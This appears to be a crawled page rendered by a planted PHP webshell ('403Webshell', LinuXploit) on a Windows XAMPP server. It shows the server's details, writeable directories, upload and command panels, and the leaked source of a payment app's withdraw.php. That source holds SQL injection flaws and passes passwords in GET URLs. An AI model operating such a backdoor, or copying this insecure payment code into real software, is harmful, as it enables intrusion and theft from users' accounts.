403Webshell
Server IP : 127.0.0.1  /  Your IP : 216.73.216.48
Web Server : Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
System : Windows NT DESKTOP-3H4FHQJ 10.0 build 19045 (Windows 10) AMD64
User : win 10 ( 0)
PHP Version : 8.2.12
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : OFF |  Perl : OFF |  Python : OFF |  Sudo : OFF |  Pkexec : OFF
Directory :  D:/xamppkk/htdocs-coblaa/cranepay/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :

[ Back ]     

Current File : D:/xamppkk/htdocs-coblaa/cranepay/withdraw.php
<html>
<?php
include('db.php');
session_start();
if(isset($_SESSION['id']))
{
$my_id = $_SESSION['id'];		

}
?> <div class="help_div">  <?php
$user_ip = getenv('REMOTE_ADDR');
$geo = unserialize(file_get_contents("http://www.geoplugin.net/php.gp?ip=$user_ip"));
$city = $geo["geoplugin_city"];
$country = $geo["geoplugin_countryName"];

$cur_date = date("d");
$cur_month = date("M");
$cur_year = date("Y");

?> </div> <?php

//////////////////////////////////////////////////////////////////////////////////// 
?>
<input id="my_id" style="display:none;" value="<?php echo"$my_id";?>" />
<head>
<title>CrinePay withdrawal</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" type="text/css" href="main_css/withdraw.css" />

</head>

<body onclick="get_focused();"  >

<div class="main_content" >

<div class="main_home_tile" ><img src="main_icon/bk.png" onclick="history.back()"  class="main_icon_img" />Cash withdraw</div>



<div class="acc_div" >
<div class="acc_div_left" >
<span class="acc_title" >Account no.</span>

<?php
if(isset($_SESSION['id']))
{
	$get_user_login ="select * from crane_pay_usertb where id='$my_id'";
	$run_get_user_login = mysqli_query($con,$get_user_login);
	while($row_get_user_login = mysqli_fetch_array($run_get_user_login))
	{
	$user_acc = $row_get_user_login['user_phone_no'];
	?>
   <span class="acc_namba" ><?php echo"$user_acc"; ?></span>
   
<?php } } ?>

<!--span class="acc_namba" >256256</span-->
</div>

<div class="acc_div_right" >

<span class="amt_title" >Available Bal</span>
<?php
//$total_amt=0;
if(isset($_SESSION['id']))
{
	$get_banktb ="select * from banktb where my_id='$my_id'";
	$run_get_bank = mysqli_query($con,$get_banktb);
	while($row_get_bank = mysqli_fetch_array($run_get_bank))
	{
	$user_amt = $row_get_bank['acc_amount'];
	//$profit_amt = $row_get_bank['profit_gain'];
	$total_amt = $user_amt;// + $profit_amt;
	?>
   <span class="amt_avail" ><?php echo"$total_amt/="; ?></span>
   
<?php } } ?>
<!--span class="amt_avail" >1000/=</span-->

</div>

</div>




<?php


$get_agt ="select * from agenttb where my_id='$my_id' AND account_type='Verified' ";
$run_agt = mysqli_query($con,$get_agt);
$chk_agt = mysqli_num_rows($run_agt);

if($chk_agt >0 ){ ?>


<div id="withdraw_input_div" class="withdraw_input_div" >

<span class="withd_amnt_lebal" >From Account no. 75*******</span>
<input type="number" id="wizd_from_acc_no" name="acc_no" minlengthk="10"  maxlength="9" class="withd_acc_name_input"/>
<span class="withd_acc_name_lebal" >Passcode</span>
<input type="text" id="wizd_passcode" name="withd_amt" class="withd_amnt_input" />
<span class="withd_acc_name_lebal" >Password</span>
<input type="Password" id="wizd_pass" name="withd_pass" class="withd_acc_name_input"/>

<button onclick="check_Withdraw();" name="withdraw_cash_btn" class="withdraw_btn" >Withdraw</button>

</div>
<div id="error_output2" ></div>

<div id="sub_error_output2" ></div>

<?php }else{  ?>

<div class="withdraw_input_div" >


<!--span class="withd_acc_no_lebal" >Account no. 75*******</span>
<input type="number" id="acc_no" name="acc_no" minlengthk="10"  maxlength="9" class="withd_acc_no_input"/-->
<span class="withd_amnt_lebal" >Amount</span>
<input type="number" id="withd_amt" name="withd_amt" class="withd_amnt_input" />
<span class="withd_acc_name_lebal" >Password</span>
<input type="Password" id="withd_pass" name="withd_pass" class="withd_acc_name_input"/>
<div id="error_output" class="error_output" ></div>

<?php 
if(isset($_POST['withdraw_cash_btn']))
{
	//$acc_no = $_POST['acc_no'];
	$acc_name = $_POST['acc_name'];
	$withd_amt = $_POST['withd_amt'];
	
     if($acc_no=="" || $acc_name=="" || $withd_amt==""){
	echo"<span style='float:left;width:100%;height:30px;line-height:30px;color:red;text-align:center;'>Fill All The Spaces</span>";	 
	 
	 }else{
		 
	$get_user ="select * from crane_pay_usertb where user_phone_no='$account_no'";
	$run_get_user = mysqli_query($con,$get_user);
	while($row_get_user = mysqli_fetch_array($run_get_user))
	{
	//$user_acc = $row_get_user['user_phone_no'];
	$tofname = $row_get_user['fname'];
	$tolname = $row_get_user['lname']; 
		 
	$insert_withdraw_amt = "insert into pending_withdrawtb (user_id,account_no,account_name,amount,user_county,user_city,cur_date,cur_month,cur_year,cur_time)
	values('$user_id','$acc_no','$acc_name','$withd_amt','$country','$city','$cur_date','$cur_month','$cur_year',CURTIME() )";
	$run_insert_withd =mysqli_query($con,$insert_withdraw_amt);
	echo"<span style='float:left;width:100%;height:30px;line-height:30px;color:green;text-align:center;'>Withdrawal Successful! Will be approved within 24hrs </span>";	 
	 
}
}
}
?>

<!--?php if(isset($_SESSION['id'])){   ?-->
<button onclick="start_Withdraw();" name="withdraw_cash_btn" class="withdraw_btn" >Withdraw</button>
<!--?php }?-->


<!--?php if(!isset($_SESSION['id'])){   ?>
<a href="login"><button class="withdraw_btn" >Withdraw</button></a>
<!?php }  ?-->


</div>

<?php }  ?>

</div>



<script> 

function start_Withdraw()
{
var char_me_level2 = 20001;
var char_me_level3 = 40001;
var char_me_level4 = 60001;
var char_me_level5 = 250001;
var char_me_level6 = 500000;
var char_me_level7 = 1000001;
	my_id = document.getElementById('my_id').value;
	//acc_no = document.getElementById('acc_no').value;
	withd_amt = document.getElementById('withd_amt').value;
	withd_pass = document.getElementById('withd_pass').value;
	//acc_no = document.getElementById('acc_no').value;
	
	if(withd_amt=="" || withd_pass==""){document.getElementById('error_output').innerHTML ="Please fill all the fields";}else{
		
	if(withd_amt < 500){document.getElementById('error_output').innerHTML ="Minimum withdrawal must be 500 /=";}else{

	if(withd_amt >1000001){document.getElementById('error_output').innerHTML ="Maximum withdrawal limit 1m";}else{
	if(withd_amt < char_me_level2 ){cur_charj = 200;}
	else if(withd_amt < char_me_level3){cur_charj = 450;}
	else if(withd_amt < char_me_level4){cur_charj = 750;}
	else if(withd_amt < char_me_level5){cur_charj = 1000;}
	else if(withd_amt < char_me_level6){cur_charj = 3000;}
    else if(withd_amt < char_me_level7){cur_charj = 4500;}
	
	
	
	xmlhttp = new XMLHttpRequest();
	xmlhttp.open("GET","autopage.php?my_id="+my_id+"&&withd_pass="+withd_pass+"&&withd_amt="+withd_amt+"&&cur_charj="+cur_charj+"&&status=start_Withdraw",false);
	xmlhttp.send(null);
	document.getElementById('error_output').innerHTML =xmlhttp.responseText;
	//document.getElementById('error_output').innerHTML ="Transaction successfully submitted";
	//document.getElementById('error_output').style ="color:green;";

	document.getElementById('withd_amt').value="";
	document.getElementById('withd_pass').value="";
	window.open('transaction','_self');
	
		}
		}
}
}


function check_Withdraw()
{   my_id = document.getElementById('my_id').value;
	wizd_from_acc_no = document.getElementById('wizd_from_acc_no').value;
	wizd_passcode = document.getElementById('wizd_passcode').value;
	wizd_pass = document.getElementById('wizd_pass').value;
	
	if(wizd_from_acc_no=="" || wizd_passcode=="" || wizd_pass==""){
		document.getElementById('sub_error_output2').innerHTML ="Fill all the fields";
		document.getElementById('sub_error_output2').style="float:left;width:100%;height:30px;line-height:30px;text-align:center;color:red;display:block;	";
	}else{
	xmlhttp = new XMLHttpRequest();
	xmlhttp.open("GET","autopage.php?my_id="+my_id+"&&wizd_from_acc_no="+wizd_from_acc_no+"&&wizd_passcode="+wizd_passcode+"&&wizd_pass="+wizd_pass+"&&status=check_Withdraw",false);
	xmlhttp.send(null);
	document.getElementById('wizd_pass').value="";
	document.getElementById('error_output2').innerHTML =xmlhttp.responseText;
	document.getElementById('error_output2').style.display="block";
	wizd_chk_out = document.getElementById('wizd_chk_out').value;
	
	if(wizd_chk_out ==1 )
	{
	document.getElementById('withdraw_input_div').style.display="block";
    document.getElementById('sub_error_output2').style.display="none";	
	}else{
	document.getElementById('withdraw_input_div').style.display="none";	
	document.getElementById('sub_error_output2').style.display="none";	
	}

}

}

function close_confirm_wizd()
{
	document.getElementById('withdraw_input_div').style.display="block";
	document.getElementById('error_output2').style.display="none";

}

function finish_Withdraw()
{
	my_id = document.getElementById('my_id').value;
	wizd_from_acc_no = document.getElementById('wizd_from_acc_no').value;
	wizd_passcode = document.getElementById('wizd_passcode').value;
	
	xmlhttp = new XMLHttpRequest();
	xmlhttp.open("GET","autopage.php?my_id="+my_id+"&&wizd_from_acc_no="+wizd_from_acc_no+"&&wizd_passcode="+wizd_passcode+"&&status=finish_Withdraw",false);
	xmlhttp.send(null);
	document.getElementById('wizd_pass').value="";
	document.getElementById('error_output2').innerHTML =xmlhttp.responseText;
	document.getElementById('error_output2').style.display="block";
	window.open('transaction','_self');
	//alert(wizd_from_acc_no); 
	//alert(wizd_passcode);
}



</script>



<body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit